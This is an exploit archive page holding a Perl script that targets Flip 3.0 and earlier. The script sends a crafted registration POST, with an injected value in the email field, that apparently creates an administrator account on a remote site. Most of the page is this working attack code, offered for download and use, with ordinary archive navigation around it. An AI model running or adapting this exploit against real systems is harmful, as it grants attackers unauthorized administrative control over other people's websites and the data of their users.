flip30-create.txt

flip30-create.txt: Posted Sep 20, 2007; Authored by undefined1_ | Site undefl.com; Flip versions 3.0 and below remote admin creation exploit.; tags | exploit, remote; SHA-256 | ab23cf363e9e4f88cda78909a85f0bc3d0a105367b23254fac3a0909722854ae; Download | Favorite | View

flip30-create.txt

#!/usr/bin/perl

use strict; 
use IO::Socket;
use Getopt::Std;

my $app = "Flip <= 3.0";
my $type = "Admin Creation";
my $author = "undefined1_";
my $vendor = "http://sourceforge.net/projects/flipsource";

my %opt;
getopts("t:", \%opt);
$| = 1;
print ":: $app $type - by $author - www.undef1.com ::\n\n\n";

my $url = $opt{t} || usage();

if($url =~ m/^(?:http:\/\/)(.*)/) {
  $url = $1;
}
if($url !~ m/^.*\/$/) {
  $url .= "/";
}

print "username you want: ";
my $user = <STDIN>;
print "password you want: ";
my $pass = <STDIN>;
chomp($user);
chomp($pass);

create_admin($url, $user, $pass);

sub create_admin {
  my $url = shift;
  my $user = shift;
  my $pass = shift;
  
  print "creating admin ... \t";
  my $content  = "un=$user&em=aaa][3\@gmail.com&pw1=$pass&pw2=$pass";
  my $data = "POST " . parse_page($url . "account.php?op=register") . " HTTP/1.1\r\n";
  $data .= "Host: " . parse_host($url) . "\r\n";
  $data .= "Connection: close\r\n";
  $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
  $data .= "Content-Length: " . length($content) . "\r\n\r\n";
  my $recv = sendpacket(parse_host($url), parse_port($url), $data.$content);

  if($recv !~ m/Successfully registered!/m) {
    print "failed\n";
    return;
  }  
  print "OK\n";    
}



# ======================================================

sub parse_host {
  my $url = shift;
  if($url =~ m/^([^\/:]+).*\//) {
    return $1;
}
  return "127.0.0.1";
}

sub parse_port {
  my $url = shift;
  if($url =~ m/^(?:[^\/:]+):(\d+)\//) {
    return $1;
}
  return "80";
}

sub parse_page {
  my $url = shift;
  if($url =~ m/^(?:[^\/]+)(\/.*)/) {
    return $1;
  }
  return "/";
}


sub sendpacket {
  my $server = shift;
  my $port = shift;
  my $data = shift;

  my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!\n";
  print $sock "$data";
  
  $data = "";
  my $resp;
  while($resp = <$sock>)  { $data .= $resp; }
  
  close($sock);
  return $data;
}

sub usage() {
  printf "usage: %s -t<url>\n", $0;
  exit;
}

Top Authors In Last 30 Days

Red Hat 247 files
Ubuntu 96 files
indoushka 49 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Debian 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,085)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,603)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,724)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

flip30-create.txt

flip30-create.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

flip30-create.txt

Share This

flip30-create.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems